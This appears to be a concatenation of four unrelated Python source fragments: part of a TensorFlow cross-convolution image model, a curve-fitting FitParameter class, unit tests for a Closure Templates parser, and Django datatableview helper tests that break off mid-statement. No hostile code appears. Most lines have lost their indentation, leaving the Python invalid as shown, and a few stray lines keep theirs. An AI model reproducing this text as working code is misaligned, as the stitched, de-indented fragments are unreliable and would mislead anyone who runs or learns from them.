kernel = self.z_mean + tf.multiply(self.z_stddev, epsilon)
width = int(math.sqrt(kernel.get_shape().as_list()[1] // 128))
kernel = tf.reshape(kernel, [batch_size, width, width, 128])
with tf.variable_scope('kernel_decoder'):
with slim.arg_scope([slim.conv2d], padding='SAME'):
kernel = slim.conv2d(kernel, 128, [5, 5], stride=1)
self.kernel = slim.conv2d(kernel, 128, [5, 5], stride=1)
sys.stderr.write('kernel shape: %s\n' % kernel.get_shape())
def _BuildImageEncoder(self):
feature_maps = []
for (i, image) in enumerate(self.images):
with tf.variable_scope('image_encoder_%d' % i):
with slim.arg_scope([slim.conv2d, slim.max_pool2d], padding='SAME'):
net = slim.conv2d(image, 64, [5, 5], stride=1)
net = slim.conv2d(net, 64, [5, 5], stride=1)
net = slim.max_pool2d(net, [5, 5])
net = slim.conv2d(net, 64, [5, 5], stride=1)
net = slim.conv2d(net, 32, [5, 5], stride=1)
net = slim.max_pool2d(net, [2, 2])
sys.stderr.write('image_conv shape: %s\n' % net.get_shape())
feature_maps.append(net)
return feature_maps
def _CrossConvHelper(self, encoded_image, kernel):
"""Cross Convolution.
    The encoded image and kernel have the same shape, namely
    [batch_size, image_size, image_size, channels]. They are split into
    [image_size, image_size] image squares and [kernel_size, kernel_size]
    kernel squares; each kernel square is used to convolve its image square.
"""
images = tf.expand_dims(encoded_image, 0)
kernels = tf.expand_dims(kernel, 3)
return tf.nn.depthwise_conv2d(images, kernels, [1, 1, 1, 1], 'SAME')
def _CrossConv(self, encoded_images):
"""Apply the motion kernel on the encoded_images."""
cross_conved_images = []
kernels = tf.split(axis=3, num_or_size_splits=4, value=self.kernel)
for (i, encoded_image) in enumerate(encoded_images):
with tf.variable_scope('cross_conv_%d' % i):
kernel = kernels[i]
encoded_image = tf.unstack(encoded_image, axis=0)
kernel = tf.unstack(kernel, axis=0)
assert len(encoded_image) == len(kernel)
assert len(encoded_image) == self.params['batch_size']
conved_image = []
        for j in range(len(encoded_image)):
conved_image.append(self._CrossConvHelper(
encoded_image[j], kernel[j]))
cross_conved_images.append(tf.concat(axis=0, values=conved_image))
sys.stderr.write('cross_conved shape: %s\n' %
cross_conved_images[-1].get_shape())
return cross_conved_images
def _Deconv(self, net, out_filters, kernel_size, stride):
shape = net.get_shape().as_list()
in_filters = shape[3]
kernel_shape = [kernel_size, kernel_size, out_filters, in_filters]
weights = tf.get_variable(
name='weights',
shape=kernel_shape,
dtype=tf.float32,
initializer=tf.truncated_normal_initializer(stddev=0.01))
out_height = shape[1] * stride
out_width = shape[2] * stride
batch_size = shape[0]
output_shape = [batch_size, out_height, out_width, out_filters]
net = tf.nn.conv2d_transpose(net, weights, output_shape,
[1, stride, stride, 1], padding='SAME')
slim.batch_norm(net)
return net
def _BuildImageDecoder(self, cross_conved_images):
"""Decode the cross_conved feature maps into the predicted images."""
nets = []
for i, cross_conved_image in enumerate(cross_conved_images):
with tf.variable_scope('image_decoder_%d' % i):
stride = 64 / cross_conved_image.get_shape().as_list()[1]
# TODO(xpan): Alternative solution for upsampling?
nets.append(self._Deconv(
cross_conved_image, 64, kernel_size=3, stride=stride))
net = tf.concat(axis=3, values=nets)
net = slim.conv2d(net, 128, [9, 9], padding='SAME', stride=1)
net = slim.conv2d(net, 128, [1, 1], padding='SAME', stride=1)
net = slim.conv2d(net, 3, [1, 1], padding='SAME', stride=1)
self.diff_output = net
sys.stderr.write('diff_output shape: %s\n' % self.diff_output.get_shape())
|
|
__description__ = \
"""
Main class for holding fit parameters, including guesses, values, ranges, etc.
"""
__date__ = "2016-09-02"
__author__ = "Michael J. Harms"
import copy
import numpy as np
class FitParameter:
"""
Class for storing and manipulating generic fit parameters.
"""
def __init__(self,name,guess=None,guess_range=None,fixed=False,bounds=None,
alias=None):
"""
Initialize class. Parameters:
name: name of parameter (string)
guess: parameter guess (float). If None, class will guess intelligently
based on the parameter name. If no intelligent guess is available,
guess will be set to 1.0.
guess_range: range of reasonable guesses (list-like object of 2 floats).
If None, class will guess intelligently based on parameter
name.
fixed: whether or not the parameter is fixed (bool)
bounds: bounds on fit for parameter (list-like object of 2 floats). If
None, bounds will be set to (None,None). If (None,5), no lower
bound, upper bound of 5.
        alias: alias for parameter name, for linking to global parameter names. (str)
If None, no alias is made.
"""
self.name = name
self.guess = guess
self.guess_range = guess_range
self.fixed = fixed
self.bounds = bounds
self.alias = alias
self._initialize_fit_results()
def _initialize_fit_results(self):
"""
Set fit results to start (stdev, ninetyfive, value to guess).
"""
self.value = self.guess
self._stdev = np.inf
self._ninetyfive = [-np.inf,np.inf]
#--------------------------------------------------------------------------
# parameter name
@property
def name(self):
"""
Name of the parameter.
"""
return self._name
@name.setter
def name(self,n):
self._name = str(n)
#--------------------------------------------------------------------------
# parameter value
@property
def value(self):
"""
Value of the parameter.
"""
return self._value
@value.setter
def value(self,v):
"""
If value is set to None, set value to self.guess value.
"""
        if v is not None:
self._value = v
else:
self._value = self.guess
#--------------------------------------------------------------------------
# parameter stdev
@property
def stdev(self):
"""
Standard deviation on the parameter.
"""
return self._stdev
@stdev.setter
def stdev(self,s):
"""
Set the standard deviation of the parameter.
"""
self._stdev = s
#--------------------------------------------------------------------------
# parameter 95% confidence
@property
def ninetyfive(self):
"""
95% confidence interval on the parameter.
"""
return self._ninetyfive
@ninetyfive.setter
def ninetyfive(self,value):
"""
Set the 95% confidence interval on the parameter.
"""
if len(value) != 2:
err = "ninetyfive requires a list-like with length 2.\n"
raise ValueError(err)
self._ninetyfive[0] = value[0]
self._ninetyfive[1] = value[1]
#--------------------------------------------------------------------------
# parameter guess
@property
def guess(self):
"""
Guess for the parameter.
"""
return self._guess
@guess.setter
def guess(self,g):
"""
Set the guess. If None, choose intelligently based on the name of the
parameter.
"""
        if g is not None:
self._guess = g
else:
if self.name.startswith("dH"):
self._guess = 1000.0
elif self.name.startswith("beta") or self.name.startswith("K"):
self._guess = 1e6
elif self.name.startswith("fx"):
self._guess = 1.0
else:
self._guess = 1.0
self._value = self._guess
self._initialize_fit_results()
#--------------------------------------------------------------------------
# parameter guess_range
@property
def guess_range(self):
"""
Range of reasonable guesses for the parameter.
"""
return self._guess_range
@guess_range.setter
def guess_range(self,g):
"""
Set range of reasonable guesses. If None, choose reasonable guess range
based on parameter name.
"""
        if g is not None:
try:
if len(g) != 2:
raise TypeError
except TypeError:
err = "Guess range must be list-like object of length 2.\n"
raise ValueError(err)
self._guess_range = copy.deepcopy(g)
else:
if self.name.startswith("dH"):
self._guess_range = [-10000.0,10000.0]
elif self.name.startswith("beta") or self.name.startswith("K"):
self._guess_range = [1.0,1e8]
elif self.name.startswith("fx"):
self._guess_range = [0.0,2.0]
else:
self._guess_range = [-10000.0,10000.0]
self._initialize_fit_results()
#--------------------------------------------------------------------------
# parameter fixed-ness.
@property
def fixed(self):
"""
        Whether or not the parameter is fixed.
"""
return self._fixed
@fixed.setter
def fixed(self,bool_value):
"""
Fix or unfix the parameter.
"""
self._fixed = bool(bool_value)
self._initialize_fit_results()
#--------------------------------------------------------------------------
# bounds for fit.
@property
def bounds(self):
"""
Fit bounds. Either list of bounds or None.
"""
return self._bounds
@bounds.setter
def bounds(self,b):
"""
Set fit bounds.
"""
        if b is not None:
try:
if len(b) != 2:
raise TypeError
except TypeError:
err = "Bounds must be list-like object of length 2\n"
raise ValueError(err)
self._bounds = tuple(copy.deepcopy(b))
else:
self._bounds = (-np.inf,np.inf)
self._initialize_fit_results()
#--------------------------------------------------------------------------
# parameter alias
@property
def alias(self):
"""
Parameter alias. Either string or None.
"""
return self._alias
@alias.setter
def alias(self,a):
"""
Set alias.
"""
try:
            if self._alias is not None and self._alias != a and a is not None:
err = "Could not set alias to {:} because it is already set to {:}".format(a,self._alias)
raise ValueError(err)
except AttributeError:
pass
self._alias = a
self._initialize_fit_results()
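
# A hedged usage sketch (not part of the class): name-based defaults kick in when
# no guess is given, and bounds can be tightened afterwards. The parameter names
# below are illustrative.
def _fit_parameter_example():
    dH = FitParameter("dH_binding")            # guess defaults to 1000.0
    K = FitParameter("K_assoc", guess=5e5)     # explicit guess overrides the default
    K.bounds = [1.0, 1e9]
    return dH.guess, dH.guess_range, K.bounds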
|
|
# -*- coding: utf-8 -*-
#
# Copyright 2012 Moskvitin Andrey <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You
# may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
import unittest
import sys
sys.path[0:0] = [""]
from pyclosuretemplates.parser import *
class TestExpressionParser(unittest.TestCase):
def setUp(self):
pass
def testLiterals(self):
self.assertEqual(parseExpression("'Hello world'"), 'Hello world')
print parseExpression("''")
self.assertEqual(parseExpression("''"), '')
self.assertEqual(parseExpression("5"), 5)
self.assertEqual(parseExpression("3.14"), 3.14)
def testVars(self):
a = parseExpression(' $var ')
self.assertIsInstance(a, Variable)
self.assertEqual(a.name, 'var')
b = parseExpression('$x.y')
self.assertIsInstance(b, DotRef)
self.assertEqual(b.name, 'y')
self.assertIsInstance(b.expr, Variable)
self.assertEqual(b.expr.name, 'x')
c = parseExpression('$x.1.y')
self.assertIsInstance(c, DotRef)
self.assertEqual(c.name, 'y')
self.assertIsInstance(c.expr, ARef)
self.assertEqual(c.expr.position, 1)
self.assertIsInstance(c.expr.expr, Variable)
self.assertEqual(c.expr.expr.name, 'x')
d = parseExpression('$x[0].y')
self.assertIsInstance(d, DotRef)
self.assertEqual(d.name, 'y')
self.assertIsInstance(d.expr, ARef)
self.assertEqual(d.expr.position, 0)
self.assertIsInstance(d.expr.expr, Variable)
self.assertEqual(d.expr.expr.name, 'x')
e = parseExpression('$x[$z].y')
self.assertIsInstance(e, DotRef)
self.assertEqual(e.name, 'y')
self.assertIsInstance(e.expr, ARef)
self.assertIsInstance(e.expr.position, Variable)
self.assertEqual(e.expr.position.name, 'z')
self.assertIsInstance(e.expr.expr, Variable)
self.assertEqual(e.expr.expr.name, 'x')
f = parseExpression('$x[0][1]')
self.assertIsInstance(f, ARef)
self.assertEqual(f.position, 1)
self.assertIsInstance(f.expr, ARef)
self.assertEqual(f.expr.position, 0)
self.assertIsInstance(f.expr.expr, Variable)
self.assertEqual(f.expr.expr.name, 'x')
g = parseExpression('$x[0][1][$y]')
self.assertIsInstance(g, ARef)
self.assertIsInstance(g.position, Variable)
self.assertEqual(g.position.name, 'y')
self.assertIsInstance(g.expr, ARef)
self.assertEqual(g.expr.position, 1)
self.assertIsInstance(g.expr.expr, ARef)
self.assertEqual(g.expr.expr.position, 0)
self.assertIsInstance(g.expr.expr.expr, Variable)
self.assertEqual(g.expr.expr.expr.name, 'x')
def testOperators(self):
a = parseExpression('-$x')
self.assertIsInstance(a, Operator)
self.assertEqual(a.op, 'neg')
self.assertIsInstance(a.args[0], Variable)
self.assertEqual(a.args[0].name, 'x')
b = parseExpression('not $x')
self.assertIsInstance(b, Operator)
self.assertEqual(b.op, 'not')
self.assertIsInstance(b.args[0], Variable)
self.assertEqual(b.args[0].name, 'x')
c = parseExpression(' $x + $y ')
self.assertIsInstance(c, Operator)
self.assertEqual(c.op, '+')
self.assertEqual(len(c.args), 2)
self.assertIsInstance(c.args[0], Variable)
self.assertEqual(c.args[0].name, 'x')
self.assertIsInstance(c.args[1], Variable)
self.assertEqual(c.args[1].name, 'y')
d = parseExpression('2 + 2')
self.assertIsInstance(d, Operator)
self.assertEqual(d.args, [2, 2])
e = parseExpression(' $x - $y ')
self.assertIsInstance(e, Operator)
self.assertEqual(e.op, '-')
self.assertEqual(len(e.args), 2)
self.assertIsInstance(e.args[0], Variable)
self.assertEqual(e.args[0].name, 'x')
self.assertIsInstance(e.args[1], Variable)
self.assertEqual(e.args[1].name, 'y')
self.assertEqual(parseExpression(' $x * $y ').op, '*')
self.assertEqual(parseExpression(' $x/$y ').op, '/')
self.assertEqual(parseExpression(' $x % $y ').op, '%')
self.assertEqual(parseExpression('$x > $y').op, '>')
self.assertEqual(parseExpression('$x < $y').op, '<')
self.assertEqual(parseExpression('$x>=$y').op, '>=')
self.assertEqual(parseExpression('$x<=$y').op, '<=')
self.assertEqual(parseExpression('$x==$y').op, '==')
self.assertEqual(parseExpression('$x!=$y').op, '!=')
self.assertEqual(parseExpression('$x and $y').op, 'and')
self.assertEqual(parseExpression('$x or $y').op, 'or')
#f = parseExpression('28 - 2 + (3 + 4)')
#self.assertIsInstance(
def testTernaryOperator(self):
a = parseExpression("max(2, $x ? min($x, $y ? 3 : 5 + 4, 6) : 4)")
self.assertIsInstance(a, Funcall)
self.assertEqual(a.name, 'max')
self.assertEqual(a.args[0], 2)
b = a.args[1]
self.assertIsInstance(b, Operator)
self.assertEqual(b.op, 'if')
self.assertIsInstance(b.args[0], Variable)
self.assertEqual(b.args[0].name, 'x')
self.assertEqual(b.args[2], 4)
c = b.args[1]
self.assertIsInstance(c, Funcall)
self.assertEqual(c.name, 'min')
self.assertIsInstance(c.args[0], Variable)
self.assertEqual(c.args[0].name, 'x')
self.assertEqual(c.args[2], 6)
d = c.args[1]
self.assertIsInstance(d, Operator)
self.assertEqual(d.op, 'if')
self.assertIsInstance(d.args[0], Variable)
self.assertEqual(d.args[0].name, 'y')
self.assertEqual(d.args[1], 3)
e = d.args[2]
self.assertIsInstance(e, Operator)
self.assertEqual(e.op, '+')
self.assertEqual(e.args, [5, 4])
def testFunctions(self):
a = parseExpression("hasData()")
self.assertIsInstance(a, Funcall)
self.assertEqual(a.name, 'hasData')
self.assertEqual(a.args, [])
b = parseExpression('min($x, $y)')
self.assertIsInstance(b, Funcall)
self.assertEqual(b.name, 'min')
self.assertIsInstance(b.args[0], Variable)
self.assertEqual(b.args[0].name, 'x')
self.assertIsInstance(b.args[1], Variable)
self.assertEqual(b.args[1].name, 'y')
c = parseExpression('min($x, max(5, $y))')
self.assertIsInstance(c, Funcall)
self.assertEqual(c.name, 'min')
self.assertIsInstance(c.args[0], Variable)
self.assertEqual(c.args[0].name, 'x')
self.assertIsInstance(c.args[1], Funcall)
self.assertEqual(c.args[1].name, 'max')
self.assertEqual(c.args[1].args[0], 5)
self.assertIsInstance(c.args[1].args[1], Variable)
self.assertEqual(c.args[1].args[1].name, 'y')
class TestCommandParser(unittest.TestCase):
def setUp(self):
pass
def testTemplateProps(self):
a = parseSingleTemplate('{template testA autoescape="true"}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'testA')
self.assertEqual(a.props.get('autoescape'), True)
b = parseSingleTemplate('{template testB private="false"}{/template}')
self.assertIsInstance(b, Template)
self.assertEqual(b.name, 'testB')
self.assertEqual(b.props.get('private'), False)
c = parseSingleTemplate('{template testC autoescape="false" private="true"}{/template}')
self.assertIsInstance(c, Template)
self.assertEqual(c.name, 'testC')
self.assertEqual(c.props.get('autoescape'), False)
self.assertEqual(c.props.get('private'), True)
d = parseSingleTemplate("""{template testD}
Hello
{/template}""")
self.assertIsInstance(d, Template)
self.assertEqual(d.name, 'testD')
self.assertEqual(d.props.get('autoescape'), None)
self.assertEqual(d.props.get('private'), None)
self.assertIsInstance(d.code, CodeBlock)
self.assertEqual(d.code[0], 'Hello')
def testSubstitutions(self):
a = parseSingleTemplate('{template substitutions}{sp}{nil}{\\r}{\\n}{\\t}{lb}{rb}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'substitutions')
self.assertIsInstance(a.code, CodeBlock)
self.assertEqual(''.join([item.char for item in a.code]), ' \r\n\t{}')
def testPrint(self):
a = parseSingleTemplate('{template helloName}Hello {$name}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'helloName')
self.assertIsInstance(a.code, CodeBlock)
self.assertEqual(a.code[0], 'Hello ')
self.assertIsInstance(a.code[1], Print)
self.assertIsInstance(a.code[1].expr, Variable)
self.assertEqual(a.code[1].expr.name, 'name')
b = parseSingleTemplate('{template test}{2 + 2}{/template}')
self.assertIsInstance(b, Template)
self.assertEqual(b.name, 'test')
self.assertIsInstance(b.code, CodeBlock)
self.assertIsInstance(b.code[0], Print)
self.assertIsInstance(b.code[0].expr, Operator)
self.assertEqual(b.code[0].expr.op, '+')
self.assertEqual(b.code[0].expr.args, [2, 2])
c = parseSingleTemplate('{template test}{2 + 2 |noAutoescape}{/template}')
self.assertIsInstance(c, Template)
self.assertEqual(c.name, 'test')
self.assertIsInstance(c.code, CodeBlock)
self.assertIsInstance(c.code[0], Print)
self.assertIsInstance(c.code[0].expr, Operator)
self.assertEqual(c.code[0].expr.op, '+')
self.assertEqual(c.code[0].expr.args, [2, 2])
self.assertEqual(c.code[0].directives.get('noAutoescape'), True)
d = parseSingleTemplate('{template test}{2 + 2 |id}{/template}')
self.assertIsInstance(d, Template)
self.assertEqual(d.name, 'test')
self.assertIsInstance(d.code, CodeBlock)
self.assertIsInstance(d.code[0], Print)
self.assertIsInstance(d.code[0].expr, Operator)
self.assertEqual(d.code[0].expr.op, '+')
self.assertEqual(d.code[0].expr.args, [2, 2])
self.assertEqual(d.code[0].directives.get('noAutoescape'), None)
self.assertEqual(d.code[0].directives.get('id'), True)
e = parseSingleTemplate("""{template test}
{2 + 2 |noAutoescape |id |escapeHtml |escapeUri |escapeJs |insertWordBreaks:5}
{/template}""")
self.assertIsInstance(e, Template)
self.assertEqual(e.name, 'test')
self.assertIsInstance(e.code, CodeBlock)
self.assertIsInstance(e.code[0], Print)
self.assertIsInstance(e.code[0].expr, Operator)
self.assertEqual(e.code[0].expr.op, '+')
self.assertEqual(e.code[0].expr.args, [2, 2])
self.assertEqual(e.code[0].directives.get('noAutoescape'), True)
self.assertEqual(e.code[0].directives.get('id'), True)
self.assertEqual(e.code[0].directives.get('escapeHtml'), True)
self.assertEqual(e.code[0].directives.get('escapeUri'), True)
self.assertEqual(e.code[0].directives.get('escapeJs'), True)
self.assertEqual(e.code[0].directives.get('insertWordBreaks'), 5)
def testLiteral(self):
a = parseSingleTemplate('{template literalTest}{literal}Test {$x} {foreach $foo in $bar}{$foo}{/foreach}{/literal}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'literalTest')
self.assertIsInstance(a.code, CodeBlock)
self.assertIsInstance(a.code[0], LiteralTag)
self.assertEqual(a.code[0].text, 'Test {$x} {foreach $foo in $bar}{$foo}{/foreach}')
def testIf(self):
a = parseSingleTemplate('{template ifTest}{if $x}Hello {$x}{/if}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'ifTest')
self.assertIsInstance(a.code, CodeBlock)
self.assertEqual(len(a.code), 1)
self.assertIsInstance(a.code[0], If)
self.assertIsInstance(a.code[0][0][0], Variable)
self.assertEqual(a.code[0][0][0].name, 'x')
self.assertIsInstance(a.code[0][0][1], CodeBlock)
self.assertEqual(a.code[0][0][1][0], 'Hello ')
self.assertIsInstance(a.code[0][0][1][1], Print)
self.assertIsInstance(a.code[0][0][1][1].expr, Variable)
self.assertEqual(a.code[0][0][1][1].expr.name, 'x')
b = parseSingleTemplate('{template ifTest}{if $x}Hello {$x}{elseif $y}By {$y}{else}Hello world{/if}{/template}').code[0]
self.assertIsInstance(b, If)
self.assertIsInstance(b[0][0], Variable)
self.assertEqual(b[0][0].name, 'x')
self.assertEqual(b[0][1][0], 'Hello ')
self.assertIsInstance(b[0][1][1], Print)
self.assertIsInstance(b[0][1][1].expr, Variable)
self.assertEqual(b[0][1][1].expr.name, 'x')
self.assertIsInstance(b[1][0], Variable)
self.assertEqual(b[1][0].name, 'y')
self.assertEqual(b[1][1][0], 'By ')
self.assertIsInstance(b[1][1][1], Print)
self.assertIsInstance(b[1][1][1].expr, Variable)
self.assertEqual(b[1][1][1].expr.name, 'y')
self.assertEqual(b[2][0], True)
self.assertEqual(b[2][1][0], 'Hello world')
def testSwitch1(self):
a = parseSingleTemplate('{template switchTest}{switch $x}{case 1}hello world{case 2, 3, 4}by-by{/switch}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'switchTest')
self.assertIsInstance(a.code, CodeBlock)
b = a.code[0]
self.assertIsInstance(b, Switch)
self.assertIsInstance(b.expr, Variable)
self.assertEqual(b.expr.name, 'x')
self.assertEqual(b.cases[0][0], [1])
self.assertEqual(list(b.cases[0][1]), ['hello world'])
self.assertEqual(b.cases[1][0], [2, 3, 4])
self.assertEqual(list(b.cases[1][1]), ['by-by'])
def testForeach(self):
a = parseSingleTemplate('{template test}{foreach $x in $y.foo }{$x}{ifempty}Hello{/foreach}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'test')
self.assertIsInstance(a.code, CodeBlock)
b = a.code[0]
self.assertIsInstance(b, Foreach)
self.assertIsInstance(b.var, Variable)
self.assertEqual(b.var.name, 'x')
self.assertIsInstance(b.expr, DotRef)
self.assertEqual(b.expr.name, 'foo')
self.assertIsInstance(b.expr.expr, Variable)
self.assertEqual(b.expr.expr.name, 'y')
c = b.code
self.assertIsInstance(c, CodeBlock)
self.assertIsInstance(c[0], Print)
self.assertIsInstance(c[0].expr, Variable)
self.assertEqual(c[0].expr.name, 'x')
d = b.ifEmptyCode
self.assertIsInstance(d, CodeBlock)
self.assertEqual(d[0], 'Hello')
def testFor(self):
a = parseSingleTemplate('{template test}{for $x in range(10)} ! {/for}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'test')
self.assertIsInstance(a.code, CodeBlock)
self.assertIsInstance(a.code[0], For)
self.assertEqual(a.code[0].range, [10])
self.assertEqual(a.code[0].code[0], '!')
b = parseSingleTemplate('{template test}{for $x in range(4, 10)} ! {/for}{/template}')
self.assertIsInstance(b, Template)
self.assertEqual(b.name, 'test')
self.assertIsInstance(b.code, CodeBlock)
self.assertIsInstance(b.code[0], For)
self.assertEqual(b.code[0].range, [4, 10])
self.assertEqual(b.code[0].code[0], '!')
c = parseSingleTemplate('{template test}{for $x in range(4, 10, 2)} ! {/for}{/template}')
self.assertIsInstance(c, Template)
self.assertEqual(c.name, 'test')
self.assertIsInstance(c.code, CodeBlock)
self.assertIsInstance(c.code[0], For)
self.assertEqual(c.code[0].range, [4, 10, 2])
self.assertEqual(c.code[0].code[0], '!')
def testCall(self):
a = parseSingleTemplate('{template test}{call helloName1 data=\"$x\" /}{/template}')
self.assertIsInstance(a.code[0], Call)
self.assertEqual(a.code[0].name, 'helloName1')
self.assertIsInstance(a.code[0].data, Variable)
self.assertEqual(a.code[0].data.name, 'x')
self.assertEqual(a.code[0].params, [])
b = parseSingleTemplate('{template test}{call helloName2}{param name: $x /}{/call}{/template}')
self.assertIsInstance(b.code[0], Call)
self.assertEqual(b.code[0].name, 'helloName2')
self.assertEqual(b.code[0].data, None)
self.assertEqual(len(b.code[0].params), 1)
self.assertEqual(b.code[0].params[0][0], 'name')
self.assertIsInstance(b.code[0].params[0][1], Variable)
self.assertEqual(b.code[0].params[0][1].name, 'x')
c = parseSingleTemplate("""{template test}
{call helloName3 data=\"$data\"}
{param a: $x /}
{param b}Hello {$y}{/param}
{/call}
{/template}""")
self.assertIsInstance(c.code[0], Call)
self.assertEqual(c.code[0].name, 'helloName3')
self.assertIsInstance(c.code[0].data, Variable)
self.assertEqual(c.code[0].data.name, 'data')
self.assertEqual(len(c.code[0].params), 2)
self.assertEqual(c.code[0].params[0][0], 'a')
self.assertIsInstance(c.code[0].params[0][1], Variable)
self.assertEqual(c.code[0].params[0][1].name, 'x')
self.assertEqual(c.code[0].params[1][0], 'b')
self.assertIsInstance(c.code[0].params[1][1], CodeBlock)
self.assertEqual(c.code[0].params[1][1][0], 'Hello ')
self.assertIsInstance(c.code[0].params[1][1][1], Print)
self.assertIsInstance(c.code[0].params[1][1][1].expr, Variable)
self.assertEqual(c.code[0].params[1][1][1].expr.name, 'y')
d = parseSingleTemplate('{template test}{call name=\"$name\" /}{/template}')
self.assertIsInstance(d.code[0], Call)
self.assertIsInstance(d.code[0].name, Variable)
self.assertEqual(d.code[0].name.name, 'name')
self.assertEqual(d.code[0].data, None)
self.assertEqual(d.code[0].params, [])
e = parseSingleTemplate('{template test}{call name=\"$x\" data=\"all\" /}{/template}')
self.assertIsInstance(e.code[0], Call)
self.assertIsInstance(e.code[0].name, Variable)
self.assertEqual(e.code[0].name.name, 'x')
self.assertEqual(e.code[0].data, True)
self.assertEqual(e.code[0].params, [])
# def testWhitespaces(self):
# pass
if __name__ == "__main__":
unittest.main()
|
|
# -*- encoding: utf-8 -*-
from datetime import datetime
from functools import partial
import django
from datatableview import helpers
import six
from .testcase import DatatableViewTestCase
from .test_app.models import ExampleModel, RelatedM2MModel
if django.VERSION < (1, 7):
test_data_fixture = 'test_data_legacy.json'
else:
test_data_fixture = 'test_data.json'
class HelpersTests(DatatableViewTestCase):
fixtures = [test_data_fixture]
def test_link_to_model(self):
""" Verifies that link_to_model works. """
helper = helpers.link_to_model
# Verify that a model without get_absolute_url() raises a complaint
related = RelatedM2MModel.objects.get(pk=1)
with self.assertRaises(AttributeError) as cm:
helper(related)
self.assertEqual(str(cm.exception), "'RelatedM2MModel' object has no attribute 'get_absolute_url'")
# Verify simple use
instance = ExampleModel.objects.get(pk=1)
output = helper(instance)
self.assertEqual(output, '<a href="#1">ExampleModel 1</a>')
# Verify text override
output = helper(instance, text="Special text")
self.assertEqual(output, '<a href="#1">Special text</a>')
# Verify ``key`` access to transition an instance to a related field
instance = ExampleModel.objects.get(pk=2)
secondary_helper = helper(key=lambda o: o.related)
output = secondary_helper(instance)
self.assertEqual(output, '<a href="#1">RelatedModel object</a>')
# Verify ``key`` access version of custom text
output = secondary_helper(instance, text="Special text")
self.assertEqual(output, '<a href="#1">Special text</a>')
def test_make_boolean_checkmark(self):
""" Verifies that make_boolean_checkmark works. """
helper = helpers.make_boolean_checkmark
# Verify simple use
output = helper("True-ish value")
self.assertEqual(output, '✔')
output = helper("")
self.assertEqual(output, '✘')
# Verify custom values
output = helper("True-ish value", true_value="Yes", false_value="No")
self.assertEqual(output, 'Yes')
output = helper("", true_value="Yes", false_value="No")
self.assertEqual(output, 'No')
def test_format_date(self):
""" Verifies that format_date works. """
helper = helpers.format_date
# Verify simple use
data = datetime.now()
secondary_helper = helper("%m/%d/%Y")
output = secondary_helper(data)
self.assertEqual(output, data.strftime("%m/%d/%Y"))
# Verify that None objects get swallowed without complaint.
# This helps ensure that the helper won't blow up for models.DateTimeField columns that are
# allowed to be null.
output = secondary_helper(None)
self.assertEqual(output, "")
def test_format(self):
""" Verifies that format works. """
helper = helpers.format
# Verify simple use
data = 1234567890
secondary_helper = helper("{0:,}")
output = secondary_helper(data)
self.assertEqual(output, "{0:,}".format(data))
# Verify ``cast`` argument
data = "1234.56789"
secondary_helper = helper("{0:.2f}", cast=float)
output = secondary_helper(data)
self.assertEqual(output, "{0:.2f}".format(float(data)))
def test_through_filter(self):
""" Verifies that through_filter works. """
helper = helpers.through_filter
target_function = lambda data, arg=None: (data, arg)
# Verify simple use
data = "Data string"
secondary_helper = helper(target_function)
output = secondary_helper(data)
self.assertEqual(output, (data, None))
# Verify ``arg`` argument
secondary_helper = helper(target_function, arg="Arg data")
output = secondary_helper(data)
self.assertEqual(output, (data, "Arg data"))
def test_itemgetter(self):
""" Verifies that itemgetter works. """
helper = helpers.itemgetter
# Verify simple index access
data = list(range(5))
secondary_helper = helper(-1)
output = secondary_helper(data)
self.assertEqual(output, data[-1])
# Verify slicing access
secondary_helper = helper(slice(1, 3))
output = secondary_helper(data)
self.assertEqual(output, data[1:3])
# Verify ellipsis works for strings
data = str(range(10))
secondary_helper = helper(slice(0, 5), ellipsis=True)
output = secondary_helper(data)
self.assertEqual(output, data[:5] + "...")
# Verify ellipsis can be customized
secondary_helper = helper(slice(0, 5), ellipsis="custom")
output = secondary_helper(data)
self.assertEqual(output, data[:5] + "custom")
# Verify ellipsis does nothing for non-string data types
data = range(10)
output = secondary_helper(data)
self.assertEqual(output, data[:5])
def test_attrgetter(self):
""" Verifies that attrgetter works. """
helper = helpers.attrgetter
# Verify simple attr lookup
data = ExampleModel.objects.get(pk=1)
secondary_helper = helper('pk')
output = secondary_helper(data)
self.assertEqual(output, data.pk)
# Verify bad attribute lookup
data = ExampleModel.objects.get(pk=1)
secondary_helper = helper('bad field name')
with self.assertRaises(AttributeError) as cm:
output = secondary_helper(data)
self.assertEqual(str(cm.exception), "'ExampleModel' object has no attribute 'bad field name'")
def test_make_xeditable(self):
""" Verifies that make_xeditable works. """
helper = helpers.make_xeditable
# Items that the helper normally expects in a callback context
internals = {'field_name': 'name'}
# Verify chain calls don't trigger rendering
secondary_helper = helper()
tertiary_helper = secondary_helper()
self.assertEqual(type(secondary_helper), partial)
self.assertEqual(type(tertiary_helper), partial)
# Verify chain ends with provision of a value
data = ExampleModel.objects.get(pk=1)
# This needs a "url" arg because we want to test successful use
output = tertiary_helper(data, url="/", **internals)
self.assertTrue(isinstance(output, six.string_types))
# Verify that no "view" kwarg means the url is required from the call
with self.assertRaises(ValueError) as cm:
tertiary_helper(data, **internals)
self.assertEqual(str(cm.exception), "'make_xeditable' cannot determine a value for 'url'.")
# Verify kwargs accumulate
kwargs1 = { 'type': 'textarea' }
kwargs2 = { 'other_arg': True }
secondary_helper = helper(**kwargs1)
expected_kwargs = dict(kwargs1, extra_attrs=[])
self.assertEqual(secondary_helper.keywords, expected_kwargs)
tertiary_helper = secondary_helper(**kwargs2)
expected_kwargs = dict(kwargs1, **dict(kwargs2, extra_attrs=[]))
self.assertEqual(tertiary_helper.keywords, expected_kwargs)
# Verify default kwarg names end up as attributes
data = ExampleModel.objects.get(pk=1)
kwargs = {
'pk': "PK DATA",
'type': "TYPE DATA",
